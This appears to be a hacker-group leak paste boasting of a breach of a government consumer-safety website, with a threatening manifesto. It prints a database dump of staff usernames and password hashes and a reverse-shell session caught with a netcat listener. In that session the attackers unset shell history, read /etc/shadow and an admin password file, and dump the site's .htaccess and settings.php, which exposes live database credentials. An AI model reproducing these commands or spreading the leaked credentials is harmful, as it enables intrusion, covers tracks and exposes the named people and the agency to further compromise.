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Jan 23rd, 2012
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  1. #opmegaupload #antisec #anonymous
  5. ", a partnership of fourteen federal agencies managed by the Federal Trade Commission
  6. (FTC)" ... "the bad guys constantly develop new ways to attack your computer, so your security software must be
  7. up-to-date to protect against the latest threats." ... etc etc you got rooted and rm'd. umad? don't like
  8. it when your site is wiped of the internet do you?
  10. If SOPA/PIPA/ACTA passes we will wage a relentless war against the corporate internet, destroying dozens upon
  11. dozens of government and company websites. As you are reading this we are amassing our allied armies of
  12. darkness, preparing boatloads of stolen booty for our next raid. We are sitting on hundreds of rooted servers
  13. getting ready to drop all your mysql dumps and mail spools. Your passwords? Your precious bank accounts? Even
  14. your online dating details?! You ain't even trying to step to this.
  16. follow @anonymousirc - browse the onion embassy - chat on anonops
  19. http://ibhg35kgdvnb7jvw.onion/onguard2.sql.gz
  26. mysql> use dc-onguardonline-gov;
  27. Reading table information for completion of table and column names
  28. You can turn off this feature to get a quicker startup with -A
  30. Database changed
  32. mysql> select name, pass, mail from users;
  33. +-----------------+---------------------------------------------------------+------------------------------+
  34. | name | pass | mail |
  35. +-----------------+---------------------------------------------------------+------------------------------+
  36. | | | |
  37. | jawheeler | $S$D8iz9Wt712JZH3bMhYcXUUaX3tNRVTbwkBscgdNKCmMlDo6oaSjY | |
  38. | sara | $S$DkGGgG/9csPNKrlKJYbgPpVGm9bk56JW4uQuf2ZLmNT13l/o82CY | |
  39. | kathryn | $S$Dxy0EJcX.CEm6KGEn1cjS64PEgPYlRP4Ruqt91gTtswD0KVkzc/x | |
  40. | austin | $S$DQZMsx2w43/LFWXszCLkBFAUKQ/BexiRa7.czFBdjjK1tMq35Rl4 | |
  41. | jason | $S$DnVMh0BZJrfdBVST4Ow2N1aV0KGvMUtdTze88iLZC0W0nNsUNm/8 | |
  42. | Alvaro Puig | $S$DwWHzFM01e61TBxvSPbGBEejoVsopUesvho0Wo144Tml2ZoRADjR | |
  43. | Nicole Vincent | $S$DMcOQb./cVlnYbw/96OGfVZX6d1qVYskzrYFSRuGCU4Kx0ycGZEN | |
  44. | Editor | $S$DwB0YkptHWqYC8efGPcmoflBe0vXU389aABfMWUmS1nuvWkE4Ams | |
  45. | FTC Admin | $S$DseEl3LIi.9C4edMCDcX2NRhO2/chTsMi4d4TE37m1Ijuz1ZRnq7 | |
  46. | Jon Morgan | $S$DjgiY7aqAQ2uQ7./japWCFnzgHITlVFDDaZAx9y2sRLm9alETR8g | |
  47. | Jessica Skretch | $S$DMIvCHhZGOkLGq9pEgC.6Y2Ilp4yy38Hao7V4sx16nuucLaozm/a | |
  48. | TJ Peeler | $S$D9kLSx.Rwn4EirqN/KAY4zvNk9W7aUgtf09E1y3EV1FBIfzJdqeY | |
  49. | chris hundycz | $S$DlRNBUv6unQ1f5.hmaSrWPSnUCGB7W/6hSk1JZYH8TKs5TdUF5r7 | |
  50. | Carrie Gelula | $S$D5E18SQmUut/PhvWwPglY5kx336LruybZyJC0cvyZfA1ugBjcnDp | |
  51. | Nat Wood | $S$DJtOBF4Ojv92uQwMcVGCvxEOwF4K/ca.StrlbCOfQ9WBb.EHe1bf | |
  52. | Amy Hebert | $S$DSZ8Fk5HSMk5l0fQPrUioUHIEZXssqvE8t9Pb6M7kQrGS1H6K7of | |
  53. | timtim | $S$DaP/UtFiHjXhOiieuVMgpp1HIkCrZM5lbqTyEpqb2nSKoqa1QBNS | |
  54. +-----------------+---------------------------------------------------------+------------------------------+
  55. 18 rows in set (0.00 sec)
  57. # nc -l -v -p 1337
  58. listening on [any] 1337 ...
  59. connect to [] from []
  60. unset HISTFILE
  61. w
  62. 21:26:24 up 7 days, 23:52, 0 users, load average: 0.57, 0.42, 0.30
  64. uname -a
  65. Linux 2.6.18-028stab095.1 #1 SMP Mon Oct 24 20:15:15 MSD 2011 x86_64 x86_64 x86_64 GNU/Linux
  66. id
  67. uid=0(root) gid=0(root) groups=501(psaadm),502(swkey-data),504(psaserv),506(psasb)
  68. cat /etc/shadow
  69. root:$1$txZfg8uw$SA00IlfD1yCKcL.bsETcI0:15208:0:99999:7:::
  70. bin:*:15075:0:99999:7:::
  71. daemon:*:15075:0:99999:7:::
  72. adm:*:15075:0:99999:7:::
  73. lp:*:15075:0:99999:7:::
  74. sync:*:15075:0:99999:7:::
  75. shutdown:*:15075:0:99999:7:::
  76. halt:*:15075:0:99999:7:::
  77. mail:*:15075:0:99999:7:::
  78. news:*:15075:0:99999:7:::
  79. uucp:*:15075:0:99999:7:::
  80. operator:*:15075:0:99999:7:::
  81. games:*:15075:0:99999:7:::
  82. gopher:*:15075:0:99999:7:::
  83. ftp:*:15075:0:99999:7:::
  84. nobody:*:15075:0:99999:7:::
  85. vcsa:!!:15075:0:99999:7:::
  86. pcap:!!:15075:0:99999:7:::
  87. nscd:!!:15075:0:99999:7:::
  88. sshd:!!:15075:0:99999:7:::
  89. rpc:!!:15075:0:99999:7:::
  90. distcache:!!:15166::::::
  91. apache:!!:15166::::::
  92. mailman:!!:15166::::::
  93. mysql:!!:15166::::::
  94. ntp:!!:15166::::::
  95. sw-cp-server:!!:15166:0:99999:7:::
  96. psaadm:!!:15166:0:99999:7:::
  97. popuser:!!:15166:0:99999:7:::
  98. mhandlers-user:!!:15166:0:99999:7:::
  99. psaftp:!!:15166:0:99999:7:::
  100. alias:!!:15166:0:99999:7:::
  101. qmaild:!!:15166:0:99999:7:::
  102. qmaill:!!:15166:0:99999:7:::
  103. qmailp:!!:15166:0:99999:7:::
  104. qmailq:!!:15166:0:99999:7:::
  105. qmailr:!!:15166:0:99999:7:::
  106. qmails:!!:15166:0:99999:7:::
  107. webalizer:!!:15166::::::
  108. named:!!:15166::::::
  109. dbus:!!:15166::::::
  110. mailnull:!!:15168::::::
  111. smmsp:!!:15168::::::
  112. xfs:!!:15168::::::
  113. dc-ogol-user:$1$VYg8euWa$zDrlOprr7IjkyRoQdlhMR/:15357:0:99999:7:::
  114. cat /etc/psa/.psa.shadow
  115. q4TaquHe
  116. ps -aux
  117. Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
  119. root 1 0.0 0.0 10372 732 ? Ss Jan15 0:07 init [3]
  120. psaadm 1069 0.0 0.0 10788 1372 ? Ss 21:26 0:00 /usr/sbin/apache -i
  121. root 1123 0.0 0.0 12640 684 ? S
  122. Order allow,deny
  125. # Don't show directory listings for URLs which map to a directory.
  126. Options -Indexes
  128. # Follow symbolic links in this directory.
  129. Options +FollowSymLinks
  131. # Make Drupal handle any 404 errors.
  132. ErrorDocument 404 /index.php
  134. # Force simple error message for requests for non-existent favicon.ico.
  136. # There is no end quote below, for compatibility with Apache 1.3.
  137. ErrorDocument 404 "The requested file favicon.ico was not found.
  140. # Set the default handler.
  141. DirectoryIndex index.php index.html index.htm
  143. # Override PHP settings that cannot be changed at runtime. See
  144. # sites/default/default.settings.php and drupal_initialize_variables() in
  145. # includes/ for settings that can be changed at runtime.
  147. # PHP 5, Apache 1 and 2.
  149. php_flag magic_quotes_gpc off
  150. php_flag magic_quotes_sybase off
  151. php_flag register_globals off
  152. php_flag session.auto_start off
  153. php_value mbstring.http_input pass
  154. php_value mbstring.http_output pass
  155. php_flag mbstring.encoding_translation off
  158. # Requires mod_expires to be enabled.
  160. # Enable expirations.
  161. ExpiresActive On
  163. # Cache all files for 2 weeks after access (A).
  164. ExpiresDefault A1209600
  167. # Do not allow PHP scripts to be cached unless they explicitly send cache
  168. # headers themselves. Otherwise all scripts would have to overwrite the
  169. # headers set by mod_expires if they want another caching behavior. This may
  170. # fail if an error occurs early in the bootstrap process, and it may cause
  171. # problems if a non-Drupal PHP file is installed in a subdirectory.
  172. ExpiresActive Off
  176. # Various rewrite rules.
  178. RewriteEngine on
  180. # Block access to "hidden" directories whose names begin with a period. This
  181. # includes directories used by version control systems such as Subversion or
  182. # Git to store control files. Files whose names begin with a period, as well
  183. # as the control files used by CVS, are protected by the FilesMatch directive
  184. # above.
  185. #
  186. # NOTE: This only works when mod_rewrite is loaded. Without mod_rewrite, it is
  187. # not possible to block access to entire directories from .htaccess, because
  188. # is not allowed here.
  189. #
  190. # If you do not have mod_rewrite installed, you should remove these
  191. # directories from your webroot or otherwise protect them from being
  192. # downloaded.
  193. RewriteRule "(^|/)\." - [F]
  195. RewriteCond %{SERVER_PORT} 80
  196. RewriteCond %{REQUEST_URI} ^/(user)
  197. RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [R,L]
  199. # If your site can be accessed both with and without the 'www.' prefix, you
  200. # can use one of the following settings to redirect users to your preferred
  201. # URL, either WITH or WITHOUT the 'www.' prefix. Choose ONLY one option:
  202. #
  203. # To redirect all users to access the site WITH the 'www.' prefix,
  204. # ( will be redirected to
  205. # uncomment the following:
  206. # RewriteCond %{HTTP_HOST} !^www\. [NC]
  207. # RewriteRule ^ http://www.%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
  208. #
  209. # To redirect all users to access the site WITHOUT the 'www.' prefix,
  210. # ( will be redirected to
  211. # uncomment the following:
  212. RewriteCond %{HTTP_HOST} ^www\.(.+)$ [NC]
  213. RewriteCond %{REQUEST_URI} !(\.xml|\.txt)$ [NC]
  214. RewriteRule ^ http://%1%{REQUEST_URI} [L,R=301]
  218. RewriteCond %{HTTP_HOST} !onguardonline\.(dev|gov|fhdigital\.net) [NC]
  219. RewriteRule ^ - [S=122]
  220. #VANITY URLs
  221. RewriteRule ^OnlineShopping$ /articles/0027-researching-products-online [NC,L,R=301]
  222. RewriteRule ^glossary$ / [NC,L,R=301]
  223. RewriteRule ^games$ /media [NC,L,R=301]
  224. RewriteRule ^partners$ /about-us [NC,L,R=301]
  225. RewriteRule ^topics$ / [NC,L,R=301]
  226. RewriteRule ^voip$ /articles/0020-shopping-online [NC,L,R=301]
  227. # ReriteRule for old files.
  228. RewriteRule ^default.aspx$ / [L,R=301]
  229. RewriteRule ^index.html$ / [L,R=301]
  230. # Topics
  231. RewriteRule ^topics/overview.aspx$ / [L,R=301]
  232. RewriteRule ^topics/net-cetera.aspx$ /features/feature-0004-featured-net-cetera-toolkit [L,R=301]
  233. RewriteRule ^topics/net-cetera-introduction.aspx$ /features/feature-0004-featured-net-cetera-toolkit
  234. [L,R=301]
  235. RewriteRule ^topics/net-cetera-kids.aspx$ /articles/0006-talk-your-kids [L,R=301]
  236. RewriteRule ^topics/net-cetera-parent-advice.aspx$ /articles/0006-talk-your-kids [L,R=301]
  237. RewriteRule ^topics/net-cetera-socializing-online.aspx$ /articles/0012-kids-and-socializing-online [L,R=301]
  238. RewriteRule ^topics/net-cetera-communicating-online.aspx$ /articles/0012-kids-and-socializing-online
  239. [L,R=301]
  240. RewriteRule ^topics/net-cetera-mobile-phones.aspx$ /articles/0026-kids-texting-and-sexting [L,R=301]
  241. RewriteRule ^topics/net-cetera-protect-computers.aspx$ /articles/0017-kids-and-computer-security [L,R=301]
  242. RewriteRule ^topics/net-cetera-parental-controls.aspx$ /articles/0029-parental-controls [L,R=301]
  243. RewriteRule ^topics/net-cetera-protect-pre-teen.aspx$ /articles/0006b-tweens [L,R=301]
  244. RewriteRule ^topics/net-cetera-heads-up-introduction.aspx$ /articles/0033-heads [L,R=301]
  245. RewriteRule ^topics/net-cetera-heads-up-share-care.aspx$ /articles/0033a-share-care [L,R=301]
  246. RewriteRule ^topics/net-cetera-heads-up-interact-tact.aspx$ /articles/0033b-interact-tact [L,R=301]
  247. RewriteRule ^topics/net-cetera-heads-up-protection-connection.aspx$ /articles/0033c-protection-connection
  248. [L,R=301]
  249. RewriteRule
  250. ^topics/net-cetera-spread-word-introduction.aspx$ /articles/0034-spread-word-about-kids’-online-safety
  251. [L,R=301]
  252. RewriteRule
  253. ^topics/net-cetera-spread-word-presentation.aspx$ /articles/0036-give-online-safety-presentation [L,R=301]
  254. RewriteRule ^topics/net-cetera-spread-word-help.aspx$ /articles/0034-spread-word-about-kids'-online-safety
  255. [L,R=301]
  256. RewriteRule ^topics/avoiding-scams.aspx$ /articles/0001-avoiding-online-scams [L,R=301]
  257. RewriteRule ^topics/broadbrand.aspx$ /articles/0022-shopping-high-speed-internet-service [L,R=301]
  258. RewriteRule ^topics/computer-disposal.aspx$ /articles/0010-disposing-old-computers [L,R=301]
  259. RewriteRule ^topics/computer-security.aspx$ /articles/0009-computer-security [L,R=301]
  260. RewriteRule ^topics/email-scams.aspx$ /articles/0002-common-online-scams [L,R=301]
  261. RewriteRule ^topics/your-health-online.aspx$ /articles/0023-buying-health-products-and-services-online
  262. [L,R=301]
  263. RewriteRule ^topics/wireless-security.aspx$ /articles/0013-securing-your-wireless-network [L,R=301]
  264. RewriteRule ^topics/identity-theft.aspx$ /articles/0005-identity-theft [L,R=301]
  265. RewriteRule ^topics/kids-privacy.aspx$ /articles/0031-kids’-privacy [L,R=301]
  266. RewriteRule ^topics/laptop-security.aspx$ /articles/0015-laptop-security [L,R=301]
  267. RewriteRule ^topics/malware.aspx$ /articles/0011-malware [L,R=301]
  268. RewriteRule ^topics/mobile-apps.aspx$ /articles/0018-understanding-mobile-apps [L,R=301]
  269. RewriteRule ^topics/online-dating-scams.aspx$ /articles/0004-online-dating-scams [L,R=301]
  270. RewriteRule ^topics/online-investing.aspx$ /articles/0021-investing-online [L,R=301]
  271. RewriteRule ^topics/online-shopping.aspx$ /articles/0020-shopping-online [L,R=301]
  272. RewriteRule ^topics/p2p-security.aspx$ /articles/0016-p2p-file-sharing-risks [L,R=301]
  273. RewriteRule ^topics/phishing.aspx$ /articles/0003-phishing [L,R=301]
  274. RewriteRule ^topics/social-networking-sites.aspx$ /articles/0012-kids-and-socializing-online [L,R=301]
  275. RewriteRule ^topics/safety-tips-tweens-teens.aspx$ / [L,R=301]
  276. RewriteRule ^topics/spyware.aspx$ /articles/0011-malware [L,R=301]
  277. RewriteRule ^topics/scareware.aspx$ /articles/0011-malware [L,R=301]
  278. RewriteRule ^topics/tax-related-ID-theft.aspx$ /articles/0008-tax-related-identity-theft [L,R=301]
  279. RewriteRule ^topics/hotspots.aspx$ /articles/0014-tips-using-public-wi-fi-networks [L,R=301]
  280. # Games
  281. RewriteRule ^games/overview.aspx$ /media/ [L,R=301]
  282. RewriteRule ^games/auction-action.aspx$ /media/game-0001-auction-action [L,R=301]
  283. RewriteRule ^games/beware-spyware.aspx$ /media/media/game-0002-beware-spyware [L,R=301]
  284. RewriteRule ^games/friend-finder.aspx$ /media/game-0003-friend-finder [L,R=301]
  285. RewriteRule ^games/health.aspx$ /media/game-0004-follywood-squares [L,R=301]
  286. RewriteRule ^games/id-theft-faceoff.aspx$ /media/game-0005-id-theft-faceoff [L,R=301]
  287. RewriteRule ^games/invasion-wireless-hackers.aspx$ /media/game-0006-invasion-wireless-hackers [L,R=301]
  288. RewriteRule ^games/invest-quest.aspx$ /media/game-0007-invest-quest [L,R=301]
  289. RewriteRule ^games/mission-laptop-security-quiz.aspx$ /media/game-0008-mission-laptop-security [L,R=301]
  290. RewriteRule ^games/online-lineup.aspx$ /media/game-0009-online-lineup [L,R=301]
  291. RewriteRule ^games/p2p-threeplay.aspx$ /media/game-0010-p2p-threeplay [L,R=301]
  292. RewriteRule ^games/phishing-scams.aspx$ /media/game-0011-phishing-scams [L,R=301]
  293. RewriteRule ^games/spam-scam-slam.aspx$ /media/game-0012-spam-scam-slam [L,R=301]
  294. RewriteRule ^games/cyber-criminal.aspx$ /media/game-0013-case-cyber-criminal [L,R=301]
  295. # Videos
  296. RewriteRule ^videos/overview.aspx$ /media [L,R=301]
  297. RewriteRule ^videos/net-cetera-videos.aspx$ /media [L,R=301]
  298. RewriteRule
  299. ^videos/net-cetera-chatting-with-kids.aspx$ /media/video-0001-net-cetera-chatting-kids-about-being-online
  300. [L,R=301]
  301. RewriteRule ^videos/net-cetera-heads-up.aspx$ /media/video-0002-heads-stop-think-click [L,R=301]
  302. RewriteRule ^videos/net-cetera-protection-connection.aspx$ /media/video-0003-protection-connection
  303. [L,R=301]
  304. RewriteRule ^videos/net-cetera-share-with-care.aspx$ /media/video-0004-share-care [L,R=301]
  305. RewriteRule ^videos/net-cetera-stand-up-to-cyberbullying.aspx$ /media/video-0005-stand-cyberbullying
  306. [L,R=301]
  307. RewriteRule ^videos/phishy-videos.aspx$ /media [L,R=301]
  308. RewriteRule ^videos/phishy-home.aspx$ /media/video-0006-phishy-home [L,R=301]
  309. RewriteRule ^videos/phishy-office.aspx$ /media/video-0007-phishy-office [L,R=301]
  310. RewriteRule ^videos/phishy-store.aspx$ /media/video-0008-phishy-store [L,R=301]
  311. RewriteRule ^videos/wireless-security-yul-kwon.aspx$ /media/video-0009-wireless-security [L,R=301]
  312. # Tools
  313. RewriteRule ^tools/buttons-banners.aspx$ /share-our-resources [L,R=301]
  314. RewriteRule ^tools/order-publications.aspx$ /share-our-resources [L,R=301]
  315. RewriteRule
  316. ^tools/subscribe-cyber-security-tips.aspx$\
  317. ?category_id=USFTCOGOL_C1 [L,R=301]
  318. # About Us
  319. RewriteRule ^about-us/overview.aspx$ /about-us [L,R=301]
  320. RewriteRule ^about-us/how-to-spread-word.aspx$ /share-our-resources [L,R=301]
  321. RewriteRule ^about-us/media-inquiries.aspx$ /about-us [L,R=301]
  322. # Other
  323. RewriteRule ^site-map.aspx$ / [L,R=301]
  324. RewriteRule ^privacy-policy.aspx$ /privacy-policy [L,R=301]
  325. # Tutorials
  326. RewriteRule ^tools/start-firewall-xp.aspx$ /media/video-0010-start-built-firewall-windows-xp [L,R=301]
  327. RewriteRule ^tools/start-firewall-osx.aspx$ /media/video-0011-start-built-firewall-mac-os-x [L,R=301]
  328. RewriteRule
  329. ^tools/password-protect-pc-xp.aspx$ /media/video-0012-password-protect-your-computer-windows-xp [L,R=301]
  330. RewriteRule
  331. ^tools/password-protect-linksys-change-password.aspx$ /media/video-0013-linksys-router-change-default-admin-
  332. password [L,R=301]
  333. RewriteRule
  334. ^tools/password-protect-netgear-change-password.aspx$ /media/video-0014-netgear-router-change-default-admin-
  335. password [L,R=301]
  336. RewriteRule
  337. ^tools/password-protect-apple-airport-change-password.aspx$ /media/video-0015-apple-airport-change-default-
  338. admin-password [L,R=301]
  339. RewriteRule
  340. ^tools/encrypt-wifi-using-wpa-password-linksys.aspx$ /media/video-0016-linksys-wireless-network-set-wpa-
  341. password [L,R=301]
  342. RewriteRule
  343. ^tools/encrypt-wifi-using-wpa-password-netgear.aspx$ /media/video-0017-netgear-wireless-network-set-wpa-
  344. password [L,R=301]
  345. RewriteRule
  346. ^tools/encrypt-wifi-using-wpa-password-apple-airport.aspx$ /media/video-0018-apple-airport-wireless-network-
  347. set-wpa-password [L,R=301]
  348. RewriteRule
  349. ^tools/allow-computer-wifi-mac-linksys.aspx$ /media/video-0019-linksys-wireless-network-restrict-access-mac-
  350. address [L,R=301]
  351. RewriteRule
  352. ^tools/allow-computer-wifi-mac-netgear.aspx$ /media/video-0020-netgear-wireless-network-restrict-access-mac-
  353. address [L,R=301]
  354. RewriteRule
  355. ^tools/allow-computer-wifi-mac-apple-airport.aspx$ /media/video-0021-apple-airport-wireless-network-restrict
  356. -access-mac-address [L,R=301]
  357. # Has no equivalent content
  358. RewriteRule ^topics/net-cetera-glossary.aspx$ /topics/protect-kids-online [L,R=301]
  359. RewriteRule ^topics/net-cetera-additional-resources.aspx$ /topics/protect-kids-online [L,R=301]
  360. RewriteRule ^topics/botnets-hackers-spam.aspx$ /topics/avoid-scams [L,R=301]
  361. RewriteRule ^topics/internet-auctions.aspx$ /topics/be-smart-online [L,R=301]
  362. RewriteRule ^topics/tips-for-buyers.aspx$ /topics/be-smart-online [L,R=301]
  363. RewriteRule ^topics/tips-for-sellers.aspx$ /topics/be-smart-online [L,R=301]
  364. RewriteRule ^topics/holiday-shopping-tips.aspx$ /articles/0020-shopping-online [L,R=301]
  365. RewriteRule ^topics/holiday-business-tips.aspx$ /articles/0020-shopping-online [L,R=301]
  366. RewriteRule ^topics/voip.aspx$ /articles/0003-phishing [L,R=301]
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  381. password [L,R=301]
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  384. password [L,R=301]
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  387. set-wpa-password [L,R=301]
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  398. RewriteRule ^index.html$ / [L,R=301]
  399. # Topics
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  401. RewriteRule
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  403. internet [L,R=301]
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  407. RewriteRule
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  409. RewriteRule
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  412. [L,R=301]
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  414. [L,R=301]
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  421. RewriteRule
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  424. [L,R=301]
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  426. [L,R=301]
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  433. RewriteRule
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  435. [L,R=301]
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  442. [L,R=301]
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  449. [L,R=301]
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  464. [L,R=301]
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  466. RewriteRule
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  468. [L,R=301]
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  479. sobre-su-comportamiento-en-línea [L,R=301]
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  483. [L,R=301]
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  487. [L,R=301]
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  496. RewriteRule ^tools/subscribe-cyber-security-tips.aspx$ / [L,R=301]
  497. # About Us
  498. RewriteRule ^about-us/overview.aspx$ /quiénes-somos [L,R=301]
  499. RewriteRule ^about-us/how-to-spread-word.aspx$ /use-nuestros-materiales [L,R=301]
  500. RewriteRule ^about-us/media-inquiries.aspx$ /contacto [L,R=301]
  501. # Other
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  503. RewriteRule ^privacy-policy.aspx$ /política-de-privacidad [L,R=301]
  504. RewriteRule ^netcetera$ / [NC,L,R=301]
  505. # Tutorials
  506. RewriteRule ^tools/start-firewall-xp.aspx$ / [L,R=301]
  507. RewriteRule ^tools/start-firewall-osx.aspx$ / [L,R=301]
  508. RewriteRule ^tools/activate-junk-mail-hotmail.aspx$ / [L,R=301]
  509. RewriteRule ^tools/activate-spam-filter-entourage-mac.aspx$ / [L,R=301]
  510. RewriteRule ^tools/activate-spam-filter-eudora.aspx$ / [L,R=301]
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  512. RewriteRule ^tools/allow-all-aol-block-others.aspx$ / [L,R=301]
  513. RewriteRule ^tools/block-listed-aol-allow-others.aspx$ / [L,R=301]
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  515. RewriteRule ^tools/password-protect-pc-xp.aspx$ / [L,R=301]
  516. RewriteRule ^tools/password-protect-linksys-change-password.aspx$ / [L,R=301]
  517. RewriteRule ^tools/password-protect-netgear-change-password.aspx$ / [L,R=301]
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  530. RewriteRule ^tools/dont-broadcast-ssid-apple-airport.aspx$ / [L,R=301]
  531. # Has no equivalent Content
  532. # Topics
  533. RewriteRule ^topics/net-cetera-glossary.aspx$ / [L,R=301]
  534. RewriteRule ^topics/net-cetera-additional-resources.aspx$ /quiénes-somos [L,R=301]
  535. RewriteRule ^topics/botnets-hackers-spam.aspx$ /articulos/s0011-software-malicioso [L,R=301]
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  538. RewriteRule ^topics/tips-for-sellers.aspx$ /topics/Sea-inteligente-en-internet [L,R=301]
  539. RewriteRule ^topics/holiday-shopping-tips.aspx$ /articulos/s0020-compras-por-internet [L,R=301]
  540. RewriteRule ^topics/holiday-business-tips.aspx$ /articulos/s0020-compras-por-internet [L,R=301]
  541. RewriteRule ^topics/voip.aspx$ /topics/Sea-inteligente-en-internet [L,R=301]
  542. # Tools
  543. RewriteRule ^tools/overview.aspx$ / [L,R=301]
  544. RewriteRule ^tools/learn-terms.aspx$ / [L,R=301]
  545. RewriteRule ^tools/download-games.aspx$ /media [L,R=301]
  546. RewriteRule ^tools/watch-tutorial.aspx$ / [L,R=301]
  547. RewriteRule ^tools/find-software-applications.aspx$ / [L,R=301]
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  551. # /sites/all/default/files/articles/pdf/ directory.
  552. RewriteRule ^(articles|articulos)/(.*)\.pdf$ /sites/default/files/articles/pdf/$2\.pdf [L]
  554. # Spanish legacy files have been moved into a new ES directory
  555. RewriteCond %{HTTP_HOST} alertaenlinea\.(dev|gov|fhdigital\.net) [NC]
  556. RewriteCond %{REQUEST_FILENAME} -f
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  559. # Modify the RewriteBase if you are using Drupal in a subdirectory or in a
  560. # VirtualDocumentRoot and the rewrite rules are not working properly.
  561. # For example if your site is at uncomment and
  562. # modify the following line:
  563. # RewriteBase /drupal
  564. #
  565. # If your site is running in a VirtualDocumentRoot at,
  566. # uncomment the following line:
  567. # RewriteBase /
  569. # Pass all requests not referring directly to files in the filesystem to
  570. # index.php. Clean URLs are handled in drupal_environment_initialize().
  571. RewriteCond %{REQUEST_FILENAME} !-f
  572. RewriteCond %{REQUEST_FILENAME} !-d
  573. RewriteCond %{REQUEST_URI} !=/favicon.ico
  574. RewriteRule ^ index.php [L]
  576. # Rules to correctly serve gzip compressed CSS and JS files.
  577. # R([^/]+)/([^/]+).zip equires both mod_rewrite and mod_headers to be enabled.
  579. # Serve gzip compressed CSS files if they exist and the client accepts gzip.
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  585. RewriteCond %{HTTP:Accept-encoding} gzip
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  595. Header append Content-Encoding gzip
  596. # Force proxies to cache gzipped & non-gzipped css/js files separately.
  597. Header append Vary Accept-Encoding
  601. ls -al
  602. total 268
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  634. cat sites/default/settings.php
  635. 'mysql',
  636. * 'database' => 'databasename',
  637. * 'username' => 'username',
  638. * 'password' => 'password',
  639. * 'host' => 'localhost',
  640. * 'port' => 3306,
  641. * 'prefix' => 'myprefix_',
  642. * 'collation' => 'utf8_general_ci',
  643. * );
  644. * @endcode
  645. *
  646. * The "driver" property indicates what Drupal database driver the
  647. * connection should use. This is usually the same as the name of the
  648. * database type, such as mysql or sqlite, but not always. The other
  649. * properties will vary depending on the driver. For SQLite, you must
  650. * specify a database file name in a directory that is writable by the
  651. * webserver. For most other drivers, you must specify a
  652. * username, password, host, and database name.
  653. *
  654. * Some database engines support transactions. In order to enable
  655. * transaction support for a given database, set the 'transactions' key
  656. * to TRUE. To disable it, set it to FALSE. Note that the default value
  657. * varies by driver. For MySQL, the default is FALSE since MyISAM tables
  658. * do not support transactions.
  659. *
  660. * For each database, you may optionally specify multiple "target" databases.
  661. * A target database allows Drupal to try to send certain queries to a
  662. * different database if it can but fall back to the default connection if not.
  663. * That is useful for master/slave replication, as Drupal may try to connect
  664. * to a slave server when appropriate and if one is not available will simply
  665. * fall back to the single master server.
  666. *
  667. * The general format for the $databases array is as follows:
  668. * @code
  669. * $databases['default']['default'] = $info_array;
  670. * $databases['default']['slave'][] = $info_array;
  671. * $databases['default']['slave'][] = $info_array;
  672. * $databases['extra']['default'] = $info_array;
  673. * @endcode
  674. *
  675. * In the above example, $info_array is an array of settings described above.
  676. * The first line sets a "default" database that has one master database
  677. * (the second level default). The second and third lines create an array
  678. * of potential slave databases. Drupal will select one at random for a given
  679. * request as needed. The fourth line creates a new database with a name of
  680. * "extra".
  681. *
  682. * For a single database configuration, the following is sufficient:
  683. * @code
  684. * $databases['default']['default'] = array(
  685. * 'driver' => 'mysql',
  686. * 'database' => 'databasename',
  687. * 'username' => 'username',
  688. * 'password' => 'password',
  689. * 'host' => 'localhost',
  690. * 'prefix' => 'main_',
  691. * 'collation' => 'utf8_general_ci',
  692. * );
  693. * @endcode
  694. *
  695. * You can optionally set prefixes for some or all database table names
  696. * by using the 'prefix' setting. If a prefix is specified, the table
  697. * name will be prepended with its value. Be sure to use valid database
  698. * characters only, usually alphanumeric and underscore. If no prefixes
  699. * are desired, leave it as an empty string ''.
  700. *
  701. * To have all database names prefixed, set 'prefix' as a string:
  702. * @code
  703. * 'prefix' => 'main_',
  704. * @endcode
  705. * To provide prefixes for specific tables, set 'prefix' as an array.
  706. * The array's keys are the table names and the values are the prefixes.
  707. * The 'default' element is mandatory and holds the prefix for any tables
  708. * not specified elsewhere in the array. Example:
  709. * @code
  710. * 'prefix' => array(
  711. * 'default' => 'main_',
  712. * 'users' => 'shared_',
  713. * 'sessions' => 'shared_',
  714. * 'role' => 'shared_',
  715. * 'authmap' => 'shared_',
  716. * ),
  717. * @endcode
  718. * You can also use a reference to a schema/database as a prefix. This maybe
  719. * useful if your Drupal installation exists in a schema that is not the default
  720. * or you want to access several databases from the same code base at the same
  721. * time.
  722. * Example:
  723. * @code
  724. * 'prefix' => array(
  725. * 'default' => 'main.',
  726. * 'users' => 'shared.',
  727. * 'sessions' => 'shared.',
  728. * 'role' => 'shared.',
  729. * 'authmap' => 'shared.',
  730. * );
  731. * @endcode
  732. * NOTE: MySQL and SQLite's definition of a schema is a database.
  733. *
  734. * Database configuration format:
  735. * @code
  736. * $databases['default']['default'] = array(
  737. * 'driver' => 'mysql',
  738. * 'database' => 'databasename',
  739. * 'username' => 'username',
  740. * 'password' => 'password',
  741. * 'host' => 'localhost',
  742. * 'prefix' => '',
  743. * );
  744. * $databases['default']['default'] = array(
  745. * 'driver' => 'pgsql',
  746. * 'database' => 'databasename',
  747. * 'username' => 'username',
  748. * 'password' => 'password',
  749. * 'host' => 'localhost',
  750. * 'prefix' => '',
  751. * );
  752. * $databases['default']['default'] = array(
  753. * 'driver' => 'sqlite',
  754. * 'database' => '/path/to/databasefilename',
  755. * );
  756. * @endcode
  757. */
  758. $databases = array (
  759. 'default' =>
  760. array (
  761. 'default' =>
  762. array (
  763. 'database' => 'dc-onguardonline-gov',
  764. 'username' => 'dc-ogol_user',
  765. 'password' => 'dated51?stun',
  766. 'host' => 'localhost',
  767. 'port' => '',
  768. 'driver' => 'mysql',
  769. 'prefix' => '',
  770. ),
  771. ),
  772. );
  774. /**
  775. * Access control for update.php script.
  776. *
  777. * If you are updating your Drupal installation using the update.php script but
  778. * are not logged in using either an account with the "Administer software
  779. * updates" permission or the site maintenance account (the account that was
  780. * created during installation), you will need to modify the access check
  781. * statement below. Change the FALSE to a TRUE to disable the access check.
  782. * After finishing the upgrade, be sure to open this file again and change the
  783. * TRUE back to a FALSE!
  784. */
  785. $update_free_access = FALSE;
  787. /**
  788. * Salt for one-time login links and cancel links, form tokens, etc.
  789. *
  790. * This variable will be set to a random value by the installer. All one-time
  791. * login links will be invalidated if the value is changed. Note that this
  792. * variable must have the same value on every web server. If this variable is
  793. * empty, a hash of the serialized database credentials will be used as a
  794. * fallback salt.
  795. *
  796. * For enhanced security, you may set this variable to a value using the
  797. * contents of a file outside your docroot that is never saved together
  798. * with any backups of your Drupal files and database.
  799. *
  800. * Example:
